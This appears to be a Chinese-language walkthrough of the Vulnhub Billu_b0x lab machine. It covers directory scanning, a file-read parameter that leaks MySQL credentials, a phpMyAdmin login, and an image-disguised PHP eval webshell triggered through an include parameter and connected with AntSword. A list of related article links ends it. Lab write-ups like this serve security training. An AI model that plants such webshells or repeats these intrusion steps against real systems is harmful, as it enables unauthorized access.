vulhub靶机Billu_b0x

1.下载靶机

https://download.vulnhub.com/billu/Billu\\_b0x.zip

2.信息收集

kali和靶机ip

访问靶机ip

扫描敏感目录

3.漏洞挖掘

一一访问每个文件

发现add.php是一个上传界面,但是功能无法使用,查看源码文件发现只是个页面,没有后台处理代码。in.php是php info信息。test文件下貌似可以进行传参

file传参

get传参不可以,用bp抓包转换为post传参

查看c.php源码

这是数据库连接文件,发现mysql连接用户名密码:

用户名:billu

密码:b0x_billu

数据库名:ica_lab

通过得到的mysql密码登录phpmyadmin成功

ica_lab数据库的auth表中,找到web登录的用户名:biLLu,密码:hEx_it。

登录web界面

上传图片,查看图片,存在目录浏览

webshell连接

上传图片马

GIF89a
<?php @eval($_POST'cmd');?>

然后使用POST传参

http://192.168.126.170/panel.php

load=uploaded_images/2.png&continue=continue

蚁剑连接

相关推荐
阿成学长_Cain12 分钟前
Linux telinit 命令详解:运行级别切换|关机重启|系统维护一站式掌握
linux·运维·前端·网络
数据知道1 小时前
网络安全工具箱:100+ 工具分类速查与选型建议
安全·web安全·网络安全
qeen872 小时前
【Linux】指令补充与shell的简单介绍
linux·运维·服务器
想你依然心痛2 小时前
内存安全语言在嵌入式中的对比:Rust vs Ada vs SPARK——形式化验证、运行时
安全·rust·spark
txg6662 小时前
路径级持久化模糊测试:XSSky 如何精准击破 XSS 漏洞
深度学习·安全·web安全·网络安全·xss
云道轩2 小时前
DeepSeek using Claude Code 重构Oracle Fusion/SAP最佳业务实践:输入并补充Oracle Fusion 安全用户文档
安全·重构·oracle fusion
阿成学长_Cain2 小时前
Linux talk 命令详解:经典终端实时聊天工具,无需图形界面即可对话
linux·运维·前端
智脑API平台2 小时前
Codex CLI一次改多个文件安全吗?提交前检查清单与PR验证流程
安全·cli·codex
一拳一个娘娘腔3 小时前
【后渗透-Linux篇】Linux 提权与逃逸:从 www-data到 root的蜕变
linux·运维·服务器
jieyucx3 小时前
零基础通关:Shell 编程核心语法全景详解
linux·运维·编程·shell